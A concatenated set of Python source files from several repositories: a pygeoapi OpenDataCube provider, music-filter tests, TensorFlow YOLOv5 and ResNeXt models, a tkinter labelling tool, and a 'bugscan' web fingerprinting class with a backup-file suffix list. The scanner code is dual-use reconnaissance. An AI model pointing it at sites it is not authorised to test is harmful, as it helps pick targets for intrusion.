properties['crs_uri'] = 'http://www.opengis.net/def/crs/EPSG/9.8.15/{}'.format(self.crs_obj.to_epsg())
properties['x_axis_label'] = 'x'
properties['y_axis_label'] = 'y'
properties['bbox_units'] = self.crs_obj.units[0]
properties['crs_type'] = 'ProjectedCRS'
properties['axes'] = [
properties['x_axis_label'], properties['y_axis_label']
]
return properties
def _get_measurement_properties(self):
"""
Helper function to normalize measurement properties
:returns: `dict` of measurement properties
"""
measurement_list = self.dc.list_measurements()
measurement_metadata = measurement_list.loc[self.data]
properties = []
for row in range(0, len(measurement_metadata)):
# for netCDF unsigned dtypes are not possible at the moment due to limitations of xarray.Dataset.to_netcdf()
dtype = measurement_metadata.iloc[row]['dtype']
if self.native_format.lower() == 'netcdf' and dtype.startswith('u'):
dtype = CAST_MAP[dtype]
aliases = None
if 'aliases' in measurement_metadata.columns and isinstance(measurement_metadata.iloc[row]['aliases'], list):
aliases = measurement_metadata.iloc[row]['aliases']
properties.append({
"id": row + 1,
"name": measurement_metadata.iloc[row]['name'],
"dtype": dtype,
"nodata": measurement_metadata.iloc[row]['nodata'],
"unit": measurement_metadata.iloc[row]['units'],
"aliases": aliases,
})
return properties
```
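For reference, the bbox reprojection in `query()` above boils down to transforming the two corner points with pyproj. A minimal standalone sketch (assuming pyproj is installed; EPSG:32633 is only an illustrative target CRS, not one used by the provider):
```python
from pyproj import CRS, Transformer

def reproject_bbox(bbox, src_epsg=4326, dest_epsg=32633):
    # bbox is (minx, miny, maxx, maxy) in the source CRS
    t = Transformer.from_crs(CRS.from_epsg(src_epsg),
                             CRS.from_epsg(dest_epsg), always_xy=True)
    minx, miny = t.transform(bbox[0], bbox[1])
    maxx, maxy = t.transform(bbox[2], bbox[3])
    return minx, miny, maxx, maxy

print(reproject_bbox((11.0, 48.0, 12.0, 49.0)))
```
Transforming only the two corners is an approximation; a rigorous bbox reprojection would densify the edges before transforming.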
#### File: src/odcprovider/records.py
```python
import datetime
import logging
from datacube.model import DatasetType
from .connector import OdcConnector
from .utils import convert_datacube_bbox_to_geojson_wgs84_polygon
from pygeoapi.provider.base import (BaseProvider,
ProviderQueryError)
LOGGER = logging.getLogger(__name__)
class OpenDataCubeRecordsProvider(BaseProvider):
"""
OGC API Records provider for an OpenDataCube instance
This provider MUST be used in its own pygeoapi collection and not as part of
an already existing data containing collection.
"""
def __init__(self, provider_def):
"""
Initialize the OpenDataCubeRecordsProvider
:param provider_def: provider definition
:returns odcprovider.OpenDataCubeRecordsProvider
"""
super().__init__(provider_def)
self.dc = OdcConnector()
LOGGER.debug("Provider initiated: name: '{}', type: '{}', data: '{}'".format(self.name, self.type, self.data))
def query(self, startindex=0, limit=10, resulttype='results',
bbox=[], datetime_=None, properties=[], sortby=[],
select_properties=[], skip_geometry=False, q=None, **kwargs):
"""
query OpenDataCube products
:param startindex: starting record to return (default 0)
:param limit: number of records to return (default 10)
:param resulttype: return results or hit limit (default results)
:param bbox: bounding box [minx,miny,maxx,maxy]
:param datetime_: temporal (datestamp or extent)
:param properties: list of tuples (name, value)
:param sortby: list of dicts (property, order)
:param select_properties: list of property names
:param skip_geometry: bool of whether to skip geometry (default False)
:param q: full-text search term(s)
:returns: dict of 0..n GeoJSON feature collection
"""
# {
# 'id': 1,
# 'name': 'dsm__MB__The_Pas_2014',
# 'description': '"dsm" data created by "MB" within the project "The_Pas_2014"',
# 'creation_time': None,
# 'format': None,
# 'label': None,
# 'lat': None,
# 'lon': None,
# 'time': None,
# 'platform': None,
# 'instrument': None,
# 'region_code': None,
# 'product_family': None,
# 'dataset_maturity': None,
# 'crs': 'EPSG:2957',
# 'spatial_dimensions': ('y', 'x'),
# 'tile_size': None,
# 'resolution': (-1.0, 1.0)
# }
#
# ToDo list datasets or measurements?
if limit < 1:
raise ProviderQueryError("limit < 1 makes no sense!")
if startindex < 0:
raise ProviderQueryError("startIndex < 0 makes no sense!")
features = [self._encode_dataset_type_as_record(self.dc.get_product_by_id(product)) for product in self.dc.list_product_names()]
# apply limit and start index
all_count = len(features)
        features = features[startindex:startindex + limit]
feature_collection = {
'type': 'FeatureCollection',
'timestamp': datetime.datetime.utcnow().isoformat(),
'numberMatched': all_count,
'numberReturned': len(features),
'features': features
}
if resulttype == 'hit limit':
return len(features)
else:
return feature_collection
def get(self, identifier, **kwargs):
"""
Get OpenDataCube product family by id
:param identifier: family id
:returns: `dict` of single record
"""
LOGGER.debug('Fetching identifier {}'.format(identifier))
return self._encode_dataset_type_as_record(self.dc.get_product_by_id(identifier), is_item=True)
    def _encode_dataset_type_as_record(self, product: DatasetType, is_item: bool = False) -> dict:
bbox = self.dc.wgs84_bbox_of_product(product.name)
record = {
'id': product.name,
'type': 'Feature',
'geometry': {
'type': 'Polygon',
'coordinates': [[
[bbox.left, bbox.top],
[bbox.right, bbox.top],
[bbox.right, bbox.bottom],
[bbox.left, bbox.bottom],
[bbox.left, bbox.top]
]]
},
'properties': self._encode_dataset_type_properties(product, is_item=is_item)
}
return record
    def _encode_dataset_type_properties(self, product: DatasetType, is_item: bool = False) -> dict:
properties = {}
# properties from metadata doc
properties_to_skip = ['links']
for metadata_key in product.metadata_doc.keys():
if metadata_key not in properties_to_skip:
property = product.metadata_doc.get(metadata_key)
if isinstance(property, dict) and 'name' in property.keys():
properties.update({metadata_key: product.metadata_doc.get(metadata_key).get('name')})
elif isinstance(property, list):
properties.update({metadata_key: property})
elif metadata_key == 'links' and \
isinstance(product.metadata_doc.get(metadata_key), list) and \
len(product.metadata_doc.get(metadata_key)) > 0 and \
is_item:
# add links to associations entry
links = []
for link in product.metadata_doc.get(metadata_key):
links.append({
'href': link.get('href'),
'hreflang': link.get('hreflang'),
'rel': link.get('rel'),
'title': link.get('title'),
'type': link.get('type')
})
self._add_resource_associations(links, product.name)
properties.update({
'associations': links
})
# properties derived via datacube.utils.documents.DocReader
properties.update(product.metadata.fields)
return properties
def _add_resource_associations(self, links: list, name: str) -> None:
types_format_map = {
'application/geo+json': 'json',
'application/ld+json': 'jsonld',
'text/html': 'html'
}
for key, value in types_format_map.items():
links.append({
'rel': 'item',
'href': '../../{}?f={}'.format(name, value),
'type': key,
'title': name
})
``` |
{
"source": "52Sarah/play-song",
"score": 3
} |
#### File: play-song/tests/test_playsongby.py
```python
from __future__ import print_function, unicode_literals
import os
import os.path
import nose.tools as nose
from tests.utils import run_filter
def test_query_ignore_case():
"""should ignore case when querying songs by an artist"""
results = run_filter('playsongby', 'tokens')
nose.assert_equal(results[0]['title'], 'The Lion Sleeps Tonight (Wimoweh)')
def test_query_trim_whitespace():
"""should trim whitespace when querying songs by an artist"""
results = run_filter('playsongby', ' tokens ')
nose.assert_equal(results[0]['title'], 'The Lion Sleeps Tonight (Wimoweh)')
def test_query_partial():
"""should match partial queries when querying songs by an artist"""
results = run_filter('playsongby', 'oken')
nose.assert_equal(results[0]['title'], 'The Lion Sleeps Tonight (Wimoweh)')
def test_result_title():
"""songby result should display songby name in title"""
results = run_filter('playsongby', 'tokens')
nose.assert_equal(results[0]['title'], 'The Lion Sleeps Tonight (Wimoweh)')
def test_result_subtitle():
"""songby result should display artist name in subtitle"""
results = run_filter('playsongby', 'tokens')
nose.assert_equal(results[0]['subtitle'], 'The Tokens')
def test_result_valid():
"""songby result should be actionable"""
results = run_filter('playsongby', 'beatl')
nose.assert_equal(results[0]['valid'], 'yes')
def test_result_artwork():
"""songby result should display correct artwork as icon"""
results = run_filter('playsongby', 'light o')
nose.assert_true(
os.path.isabs(results[0]['icon']['path']),
'artwork path is not an absolute path')
nose.assert_true(
os.path.exists(results[0]['icon']['path']),
'artwork path does not exist')
def test_no_results():
"""should return 'No Results Found' in the case of no song results"""
results = run_filter('playsongby', 'zxy')
nose.assert_equal(results[0]['title'], 'No Results Found')
nose.assert_equal(results[0]['subtitle'], 'No songs matching \'zxy\'')
nose.assert_equal(results[0]['valid'], 'no')
nose.assert_equal(results[0]['icon']['path'],
'resources/icon-noartwork.png')
nose.assert_equal(len(results), 1)
``` |
{
"source": "530393297/bugscan",
"score": 3
} |
#### File: lib/core/webdna.py
```python
import sys, os, json, asyncio, hashlib, aiohttp
class CMSError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class Webdna:
def __init__(self, url):
filename = os.path.join(sys.path[0], "data", "data.json")
fp = open(filename)
self.j = json.load(fp)
self.url = url
self.loop = None
fp.close()
def getmd5(self, body):
m2 = hashlib.md5()
m2.update(body)
return m2.hexdigest()
async def whatweb(self, d, scode):
if d["md5"]:
md5 = self.getmd5(scode)
if (md5 == d["md5"]):
print(d)
raise CMSError(d)
else:
re = d["re"]
if (scode.decode("utf-8", "ignore").find(re) != -1):
print(d)
raise CMSError(d)
async def fetch(self, d, session):
_url = self.url
url = _url + d["url"]
async with session.get(url, timeout=10) as response:
status = response.status
if status != 200:
return False
scode = await response.read()
if not scode:
return
await self.whatweb(d, scode)
async def run1(self):
# Fetch all responses within one Client session,
# keep connection alive for all requests.
async with aiohttp.ClientSession() as session:
tasks = []
for d in self.j:
task = asyncio.ensure_future(self.fetch(d, session))
tasks.append(task)
await asyncio.gather(*tasks)
        # all fetch tasks have completed here; a fingerprint match
        # raises CMSError, which is handled in run()
def run(self):
loop = asyncio.get_event_loop()
self.loop = loop
result = {}
try:
future = asyncio.ensure_future(self.run1())
loop.run_until_complete(future)
except CMSError as e:
result = str(e)
# print(e)
self.loop.stop()
except Exception as e:
print(e)
return result
```
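A hypothetical usage sketch of the fingerprint scanner above (it assumes the fingerprint database exists at `data/data.json` with entries carrying the `url`, `md5` and `re` keys that `whatweb()` reads; the target URL is illustrative):
```python
# Webdna.run() returns the stringified matching fingerprint entry,
# or an empty dict when nothing matched.
if __name__ == '__main__':
    detector = Webdna('http://example.com')
    print(detector.run())
```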
#### File: bugscan/script/bakscan.py
```python
DIR_PROBE_EXTS = ['.tar.gz', '.zip', '.rar', '.tar.bz2']  # archive suffixes probed for directory backups
FILE_PROBE_EXTS = ['.bak', '.swp', '.1']  # suffixes probed for file backups
class Spider:
def run(self,url,html):
pass
``` |
{
"source": "530824679/2D_ObjectDetect",
"score": 3
} |
#### File: 2D_ObjectDetect/model/basenet.py
```python
import tensorflow as tf
def bn(input):
with tf.variable_scope('bn'):
gamma=tf.Variable(tf.random_normal(shape=[input.shape[-1].value]), name='weight',trainable=False)
beta = tf.Variable(tf.random_normal(shape=[input.shape[-1].value]), name='bias',trainable=False)
mean = tf.Variable(tf.random_normal(shape=[input.shape[-1].value]), name='running_mean',trainable=False)
var = tf.Variable(tf.random_normal(shape=[input.shape[-1].value]), name='running_var',trainable=False)
out = tf.nn.batch_normalization(input, mean, var, beta, gamma,variance_epsilon=0.001)
return out
def conv(input, out_channels, ksize, stride, name='conv', add_bias=False):
filter = tf.Variable(tf.random_normal(shape=[ksize, ksize, input.shape[-1].value, out_channels]), name=name+'/weight', trainable=False)
if ksize > 1:
pad_h, pad_w = ksize//2, ksize//2
paddings = tf.constant([[0, 0], [pad_h, pad_h], [pad_w, pad_w], [0, 0]])
input = tf.pad(input, paddings, 'CONSTANT')
net = tf.nn.conv2d(input, filter, [1,stride, stride, 1], padding="VALID")
if add_bias:
bias = tf.Variable(tf.random_normal(shape=[out_channels]), name=name + '/bias',trainable=False)
net = tf.nn.bias_add(net,bias)
return net
def convBnLeakly(input, out_channels, ksize, stride, name):
with tf.variable_scope(name):
net = conv(input, out_channels, ksize, stride)
net = bn(net)
# swish
# net=tf.nn.sigmoid(net)*net
# v2.0
# net=tf.nn.leaky_relu(net,alpha=0.1)
# v3.0
net = net * tf.nn.relu6(net + 3.0) / 6.0
return net
def focus(input, out_channels, ksize, name):
    s1 = input[:, ::2, ::2, :]
    s2 = input[:, 1::2, ::2, :]
    s3 = input[:, ::2, 1::2, :]
    s4 = input[:, 1::2, 1::2, :]
net = tf.concat([s1, s2, s3, s4], axis=-1)
net = convBnLeakly(net, out_channels, ksize, 1, name+'/conv')
return net
def bottleneck(input, c1, c2, shortcut, e, name):
with tf.variable_scope(name):
net = convBnLeakly(input,int(c2 * e), 1, 1, 'cv1')
net = convBnLeakly(net, c2, 3, 1, 'cv2')
if (shortcut and c1==c2):
net += input
return net
def bottleneckCSP(input, c1, c2, n, shortcut, e, name):
c_ = int(c2 * e)
with tf.variable_scope(name):
net1 = convBnLeakly(input, c_, 1, 1, 'cv1')
for i in range(n):
net1 = bottleneck(net1, c_, c_, shortcut, 1.0, name='m/%d'%i)
net1 = conv(net1, c_, 1, 1, name='cv3')
net2 = conv(input, c_, 1, 1, 'cv2')
net = tf.concat((net1, net2), -1)
net = bn(net)
net = tf.nn.leaky_relu(net, alpha=0.1)
net = convBnLeakly(net, c2, 1, 1, 'cv4')
return net
def spp(input, c1, c2, k1, k2, k3, name):
c_ = c1//2
with tf.variable_scope(name):
net = convBnLeakly(input, c_, 1, 1, 'cv1')
net1 = tf.nn.max_pool(net, ksize=[1, k1, k1, 1], strides=[1, 1, 1, 1], padding="SAME")
net2 = tf.nn.max_pool(net, ksize=[1, k2, k2, 1], strides=[1, 1, 1, 1], padding="SAME")
net3 = tf.nn.max_pool(net, ksize=[1, k3, k3, 1], strides=[1, 1, 1, 1], padding="SAME")
net = tf.concat((net, net1, net2, net3), -1)
net = convBnLeakly(net, c2, 1, 1, 'cv2')
return net
```
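The `focus` block above is the YOLOv5 space-to-depth rearrangement: every 2x2 spatial block is folded into the channel axis before the first convolution. A quick numpy sanity check of the same slicing, independent of TensorFlow:
```python
import numpy as np

# toy NHWC tensor: 1 image, 4x4 pixels, 1 channel
x = np.arange(16).reshape(1, 4, 4, 1)
s1 = x[:, ::2, ::2, :]
s2 = x[:, 1::2, ::2, :]
s3 = x[:, ::2, 1::2, :]
s4 = x[:, 1::2, 1::2, :]
y = np.concatenate([s1, s2, s3, s4], axis=-1)
print(x.shape, '->', y.shape)  # (1, 4, 4, 1) -> (1, 2, 2, 4)
```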
#### File: 2D_ObjectDetect/model/network.py
```python
import numpy as np
import tensorflow as tf
from cfg.config import *
from model.basenet import *
from utils.data_utils import *
class Network(object):
def __init__(self, is_train):
self.is_train = is_train
self.anchors = read_anchors(path_params['anchor_file'])
self.classes = read_class_names(path_params['class_file'])
self.class_num = len(self.classes)
self.strides = np.array(model_params['strides'])
self.anchor_per_scale = model_params['anchor_per_scale']
def forward(self, inputs):
try:
conv_lbbox, conv_mbbox, conv_sbbox = self.build_network(inputs)
except:
raise NotImplementedError("Can not build up yolov5 network!")
with tf.variable_scope('pred_sbbox'):
pred_sbbox = self.reorg_layer(conv_sbbox, self.anchors[0], self.strides[0])
with tf.variable_scope('pred_mbbox'):
pred_mbbox = self.reorg_layer(conv_mbbox, self.anchors[1], self.strides[1])
with tf.variable_scope('pred_lbbox'):
pred_lbbox = self.reorg_layer(conv_lbbox, self.anchors[2], self.strides[2])
logits = [conv_sbbox, conv_mbbox, conv_lbbox]
preds = [pred_sbbox, pred_mbbox, pred_lbbox]
return logits, preds
def build_network(self, inputs):
# backbone
focus_0 = focus(inputs, 64, 3, 'model/0')
conv_1 = convBnLeakly(focus_0, 128, 3, 2, "model/1")
bottleneck_csp_2 = bottleneckCSP(conv_1, 128, 128, 3, True, 0.5, "model/2")
conv_3 = convBnLeakly(bottleneck_csp_2, 256, 3, 2, 'model/3')
bottleneck_csp_4 = bottleneckCSP(conv_3, 256, 256, 9, True, 0.5, 'model/4')
conv_5 = convBnLeakly(bottleneck_csp_4, 512, 3, 2, 'model/5')
bottleneck_csp_6 = bottleneckCSP(conv_5, 512, 512, 9, True, 0.5, 'model/6')
conv_7 = convBnLeakly(bottleneck_csp_6, 1024, 3, 2, 'model/7')
spp_8 = spp(conv_7, 1024, 1024, 5, 9, 13, 'model/8')
# neck
bottleneck_csp_9 = bottleneckCSP(spp_8, 1024, 1024, 3, False, 0.5, 'model/9')
conv_10 = convBnLeakly(bottleneck_csp_9, 512, 1, 1, 'model/10')
shape = [conv_10.shape[1].value * 2, conv_10.shape[2].value * 2]
        # resize method: 0 = bilinear, 1 = nearest neighbour, 2 = bicubic, 3 = area interpolation
deconv_11 = tf.image.resize_images(conv_10, shape, method=1)
concat_12 = tf.concat((deconv_11, bottleneck_csp_6), -1)
bottleneck_csp_13 = bottleneckCSP(concat_12, 1024, 512, 3, False, 0.5, 'model/13')
conv_14 = convBnLeakly(bottleneck_csp_13, 256, 1, 1, 'model/14')
shape = [conv_14.shape[1].value * 2, conv_14.shape[2].value * 2]
deconv_15 = tf.image.resize_images(conv_14, shape, method=1)
concat_16 = tf.concat((deconv_15, bottleneck_csp_4), -1)
bottleneck_csp_17 = bottleneckCSP(concat_16, 512, 256, 3, False, 0.5, 'model/17')
conv_18 = convBnLeakly(bottleneck_csp_17, 256, 3, 2, 'model/18')
concat_19 = tf.concat((conv_18, conv_14), -1)
bottleneck_csp_20 = bottleneckCSP(concat_19, 512, 512, 3, False, 0.5, 'model/20')
conv_21 = convBnLeakly(bottleneck_csp_20, 512, 3, 2, 'model/21')
concat_22 = tf.concat((conv_21, conv_10), -1)
bottleneck_csp_23 = bottleneckCSP(concat_22, 1024, 1024, 3, False, 0.5, 'model/23')
# head
conv_24_m0 = conv(bottleneck_csp_17, 3 * (self.class_num + 5), 1, 1, 'model/24/m/0', add_bias=True)
conv_24_m1 = conv(bottleneck_csp_20, 3 * (self.class_num + 5), 1, 1, 'model/24/m/1', add_bias=True)
conv_24_m2 = conv(bottleneck_csp_23, 3 * (self.class_num + 5), 1, 1, 'model/24/m/2', add_bias=True)
return conv_24_m0, conv_24_m1, conv_24_m2
def reorg_layer(self, feature_maps, anchors, strides):
"""
解码网络输出的特征图
:param feature_maps:网络输出的特征图
:param anchors:当前层使用的anchor尺度
:param stride:特征图相比原图的缩放比例
:return: 预测层最终的输出 shape=[batch_size, feature_size, feature_size, anchor_per_scale, 5 + class_num]
"""
feature_shape = tf.shape(feature_maps)[1:3]
batch_size = tf.shape(feature_maps)[0]
anchor_per_scale = len(anchors)
predict = tf.reshape(feature_maps, (batch_size, feature_shape[0], feature_shape[1], anchor_per_scale, 5 + self.class_num))
conv_raw_xy = predict[:, :, :, :, 0:2]
conv_raw_wh = predict[:, :, :, :, 2:4]
conv_raw_conf = predict[:, :, :, :, 4:5]
conv_raw_prob = predict[:, :, :, :, 5:]
        y = tf.tile(tf.range(feature_shape[0], dtype=tf.int32)[:, tf.newaxis], [1, feature_shape[1]])
        x = tf.tile(tf.range(feature_shape[1], dtype=tf.int32)[tf.newaxis, :], [feature_shape[0], 1])
xy_cell = tf.concat([x[:, :, tf.newaxis], y[:, :, tf.newaxis]], axis=-1)
xy_cell = tf.tile(xy_cell[tf.newaxis, :, :, tf.newaxis, :], [batch_size, 1, 1, anchor_per_scale, 1])
xy_cell = tf.cast(xy_cell, tf.float32)
bboxes_xy = (tf.sigmoid(conv_raw_xy) + xy_cell) * strides
bboxes_wh = (tf.sigmoid(conv_raw_wh) * anchors) * strides
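        # Decode sketch: for a grid cell at column cx with raw output tx,
        # the box centre x is (sigmoid(tx) + cx) * stride; e.g. with
        # stride 8, cx = 3 and sigmoid(tx) = 0.25, centre x = (0.25 + 3) * 8 = 26.0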
pred_xywh = tf.concat([bboxes_xy, bboxes_wh], axis=-1)
pred_box_confidence = tf.sigmoid(conv_raw_conf)
pred_box_class_prob = tf.sigmoid(conv_raw_prob)
return tf.concat([pred_xywh, pred_box_confidence, pred_box_class_prob], axis=-1)
``` |
{
"source": "530824679/AbnormalBehaviorRecognition",
"score": 3
} |
#### File: 530824679/AbnormalBehaviorRecognition/model.py
```python
import numpy as np
from ops import *
"""
So, the total number of layers is (3*blocks)*residual_layer_num + 2
because each block = split (2 convs) + transition (1 conv) = 3 layers,
and the first conv layer and the last dense layer add 1 each;
thus, total number of layers = (3*blocks)*residual_layer_num + 2
"""
class Network():
def __init__(self, num_classes, is_train, reduction_ratio, block, cardinality, depth):
self.is_train = is_train
self.num_classes = num_classes
self.reduction_ratio = reduction_ratio
self.block = block # res block (split + transition)
self.cardinality = cardinality # split number
self.depth = depth # out channel
def first_layer(self, input, scope):
with tf.name_scope(scope):
net = ConvLayer(input, filter=64, kernel=[3, 3], stride=1, scope=scope+'_conv1')
net = BatchNormalization(net, is_train=self.is_train, scope=scope+'_batch1')
net = Relu(net, scope=scope+'_relu1')
return net
def squeeze_excitation_layer(self, input, out_dim, ratio, scope):
"""
Squeeze Excitation
arguments:
input(tf.Tensor): a 4D tensor
4D tensor with shape:
`(batch_size, channels, rows, cols)`
out_dim: input channels num
ratio: full connect reduction ratio
        :return: tf.Tensor: the input rescaled channel-wise by the excitation weights, i.e. input * excitation
"""
with tf.name_scope(scope):
squeeze = GlobalAveragePool(input)
            excitation = Fully_connected(squeeze, num_classes=out_dim // ratio, scope=scope+'_fully_connected1')
excitation = Relu(excitation, scope=scope+'_relu')
excitation = Fully_connected(excitation, num_classes=out_dim, scope=scope+'_fully_connected2')
excitation = Sigmoid(excitation)
excitation = tf.reshape(excitation, [-1, 1, 1, out_dim])
scale = input * excitation
return scale
def transform_layer(self, input, stride, scope):
with tf.name_scope(scope):
net = ConvLayer(input, filter=self.depth, kernel=[1, 1], stride=1, scope=scope + '_conv1')
net = BatchNormalization(net, is_train=self.is_train, scope=scope + '_batch1')
net = Relu(net, scope=scope + '_relu1')
net = ConvLayer(net, filter=self.depth, kernel=[3, 3], stride=stride, scope=scope + '_conv2')
net = BatchNormalization(net, is_train=self.is_train, scope=scope + '_batch2')
net = Relu(net, scope=scope + '_relu2')
return net
def split_layer(self, input, stride, scope):
with tf.name_scope(scope):
layers_split = list()
for i in range(self.cardinality):
splits = self.transform_layer(input, stride=stride, scope=scope + '_splitN_' + str(i))
layers_split.append(splits)
return Concat(layers_split)
def transition_layer(self, input, out_dim, scope):
with tf.name_scope(scope):
net = ConvLayer(input, filter=out_dim, kernel=[1, 1], stride=1, scope=scope+'_conv1')
net = BatchNormalization(net, is_train=self.is_train, scope=scope+'_batch1')
return net
def residual_layer(self, input, out_dim, layer_num, res_block=3):
# split + transform + transition + merge
for i in range(res_block):
input_dim = int(np.shape(input)[-1])
if input_dim * 2 == out_dim:
flag = True
stride = 2
channel = input_dim // 2
else:
flag = False
stride = 1
net = self.split_layer(input, stride=stride, scope='split_layer_'+layer_num+'_'+str(i))
net = self.transition_layer(net, out_dim=out_dim, scope='trans_layer_'+layer_num+'_'+str(i))
net = self.squeeze_excitation_layer(net, out_dim=out_dim, ratio=self.reduction_ratio, scope='squeeze_layer_'+layer_num+'_'+str(i))
if flag is True:
pad_input_x = AveragePool(input)
pad_input_x = tf.pad(pad_input_x, [[0, 0], [0, 0], [0, 0], [channel, channel]])
else:
pad_input_x = input
            input = Relu(net + pad_input_x, scope='residual_relu_layer_' + layer_num + '_' + str(i))
        return input
def build_network(self, input):
net = self.first_layer(input, scope='first_layer')
net = self.residual_layer(net, out_dim=64, layer_num='res_1', res_block=self.block)
net = self.residual_layer(net, out_dim=128, layer_num='res_2', res_block=self.block)
net = self.residual_layer(net, out_dim=256, layer_num='res_3', res_block=self.block)
net = GlobalAveragePool(net)
net = flatten(net)
net = Fully_connected(net, num_classes=self.num_classes, scope='fully_connected')
return net
```
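Per the layer-count note at the top of the file, each block contributes 3 conv layers (2 in the split, 1 in the transition), the network stacks 3 residual stages, and the first conv plus the final dense layer add 2 more. A small sketch of that arithmetic (a reading of the comment, not code from the repository):
```python
def total_layers(blocks, residual_stages=3):
    # (3 * blocks) * residual_stages + first conv + final dense layer
    return 3 * blocks * residual_stages + 2

print(total_layers(3))  # 29 layers for res_block=3
```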
#### File: 530824679/AbnormalBehaviorRecognition/ops.py
```python
import tensorflow as tf
from tensorflow.contrib.layers import batch_norm, flatten
from tensorflow.contrib.framework import arg_scope
def ConvLayer(input, filter, kernel, stride, padding='SAME', scope="conv"):
with tf.name_scope(scope):
return tf.layers.conv2d(inputs=input,
use_bias=False,
filters=filter,
kernel_size=kernel,
strides=stride,
padding=padding)
def AveragePool(input, pool_size=[2, 2], stride=2, padding='SAME', scope="average_pool"):
with tf.name_scope(scope):
return tf.layers.average_pooling2d(inputs=input,
pool_size=pool_size,
strides=stride,
padding=padding)
def MaxPool(input, pool_size=[2, 2], stride=2, padding='SAME', scope="max_pool"):
with tf.name_scope(scope):
return tf.layers.max_pooling2d(inputs=input,
pool_size=pool_size,
strides=stride,
padding=padding)
def GlobalAveragePool(input, data_format='channels_last', scope="gap"):
"""
Global Average Pooling
arguments:
input(tf.Tensor): a 4D tensor
If `data_format='channels_last'`:
4D tensor with shape:
`(batch_size, rows, cols, channels)`
- If `data_format='channels_first'`:
4D tensor with shape:
`(batch_size, channels, rows, cols)`
        data_format(string): one of 'channels_last' (default) or 'channels_first'
'channels_last' corresponds to inputs with shape (batch, height, width, channels)
'channels_first' corresponds to inputs with shape (batch, channels, height, width)
    :return: tf.Tensor: the pooled tensor (keep_dims=True).
        4D tensor with shape:
        (batch_size, 1, 1, channels)
"""
assert input.shape.ndims == 4
with tf.name_scope(scope):
if data_format == 'channels_last':
axis = [1, 2]
else:
axis = [2, 3]
return tf.reduce_mean(input, axis, name='global_average_pool', keep_dims=True)
def BatchNormalization(input, is_train, scope):
with arg_scope([batch_norm],
scope=scope,
updates_collections=None,
decay=0.9,
center=True,
scale=True,
zero_debias_moving_mean=True):
return tf.cond(is_train,
lambda: batch_norm(inputs=input, is_training=is_train, reuse=None),
lambda: batch_norm(inputs=input, is_training=is_train, reuse=True))
def Relu(input, scope="relu"):
with tf.name_scope(scope):
return tf.nn.relu(input)
def Sigmoid(input, scope="sigmoid"):
with tf.name_scope(scope):
return tf.nn.sigmoid(input)
def Concat(layers, scope="concat"):
with tf.name_scope(scope):
return tf.concat(layers, axis=3)
def Fully_connected(input, num_classes, scope='fully_connected'):
with tf.name_scope(scope):
return tf.layers.dense(inputs=input, use_bias=False, units=num_classes)
``` |
{
"source": "530824679/BucklePictureTool",
"score": 3
} |
#### File: 530824679/BucklePictureTool/tools.py
```python
import os
import glob
import tkinter as tk
import tkinter.filedialog as dlg
import tkinter.messagebox as msgbx
from tkinter import Label, Button, Canvas, Entry, Frame
from PIL import Image, ImageTk
class ImageData():
def __init__(self, path):
self.file_path = path
self.base_name = None
self.isEditted = False
self.set_basename()
def set_basename(self):
if self.file_path is not None:
self.base_name = os.path.basename(self.file_path)
class DataAnnotationTool(object):
def __init__(self):
self.image_dir = None
self.save_dir = None
self.data_list = []
self.num_img_file = 0
self.ref_id = None
self.window_width = 1000
self.window_height = 800
self.class_index = 1
self.class_dict = {
"calling": 0,
"normal": 1,
"smoking": 2
}
self.anno_index = 0
self.set_widgets()
def set_widgets(self):
# create main window
self.mainWindow = tk.Tk()
self.mainWindow.geometry(str(self.window_width) + 'x' + str(self.window_height))
self.mainWindow.title("data annotation tool")
# create total Frame to lay out all components
self.frame = Frame(self.mainWindow)
self.frame.pack(fill=tk.BOTH, expand=tk.YES, side=tk.LEFT)
# create directory label frame
self.lf_dir = tk.LabelFrame(self.frame, text='Directory')
self.lf_dir.pack(fill=tk.BOTH, anchor=tk.W, padx=10, pady=2)
# create diectory entry bar
        self.src_label_img = tk.Label(self.lf_dir, text="Image dir:")
self.src_label_img.grid(row=0)
self.load_entry_dir = tk.Entry(self.lf_dir, width=110)
self.load_entry_dir.grid(row=0, column=1, columnspan=10)
# create open button
self.open_btn_dir = tk.Button(self.lf_dir, text='Open Folder', command=self.open_img_directory, width=14)
self.open_btn_dir.grid(row=0, column=12, padx=15)
        self.dst_label_img = tk.Label(self.lf_dir, text="Save dir:")
self.dst_label_img.grid(row=1)
self.save_entry_dir = tk.Entry(self.lf_dir, width=110)
self.save_entry_dir.grid(row=1, column=1, rowspan=2, columnspan=10)
# create save button
self.save_btn_dir = tk.Button(self.lf_dir, text='Save Folder', command=self.open_save_directory, width=14)
self.save_btn_dir.grid(row=1, column=12, columnspan=2, padx=15, pady=10)
# create image canvas
self.f_canvas = tk.Frame(self.frame)
self.f_canvas.pack(fill=tk.X, padx=10)
# create file list box
self.lf_filelistbox = tk.LabelFrame(self.f_canvas, text='file list', fg='Blue')
self.lf_filelistbox.pack(side=tk.LEFT, fill=tk.Y)
self.sc_file = tk.Scrollbar(self.lf_filelistbox)
self.sc_file.pack(side=tk.RIGHT, fill=tk.Y)
filelistvar = tk.StringVar("")
self.filelistbox = tk.Listbox(self.lf_filelistbox, listvariable=filelistvar, yscrollcommand=self.sc_file.set)
self.filelistbox.configure(selectmode="single")
self.filelistbox.pack(side=tk.LEFT, fill=tk.Y)
self.filelistbox.bind('<<ListboxSelect>>', self.filelistbox_selected)
self.sc_file.config(command=self.filelistbox.yview)
self.f_canvas_ref = tk.Frame(self.f_canvas)
self.f_canvas_ref.pack(side=tk.LEFT)
self.canvas_ref = tk.Canvas(self.f_canvas_ref, bg="black", width=600, height=520)
self.canvas_ref.pack(side=tk.LEFT, padx=5)
self.canvas_ref.bind("<ButtonPress-1>", self.on_left_clicked)
self.canvas_ref.bind("<ButtonRelease-1>", self.on_left_released)
self.canvas_ref.bind("<ButtonPress-3>", self.on_right_clicked)
self.canvas_ref.bind("<ButtonRelease-3>", self.on_right_released)
self.canvas_ref.bind("<Button1-Motion>", self.on_mouse_move)
self.canvas_ref.bind("<Button3-Motion>", self.on_mouse_move)
# create class list box
self.lf_classlistbox = tk.LabelFrame(self.f_canvas, text='class list', fg='Blue')
self.lf_classlistbox.pack(side=tk.TOP, fill=tk.X)
self.sc_class = tk.Scrollbar(self.lf_classlistbox)
self.sc_class.pack(side=tk.RIGHT, fill=tk.Y)
classinfo = ("calling", "normal", "smoking")
classlistvar = tk.StringVar(value=classinfo)
self.classlistbox = tk.Listbox(self.lf_classlistbox, listvariable=classlistvar, height=8, yscrollcommand=self.sc_class.set)
self.classlistbox.configure(selectmode="single")
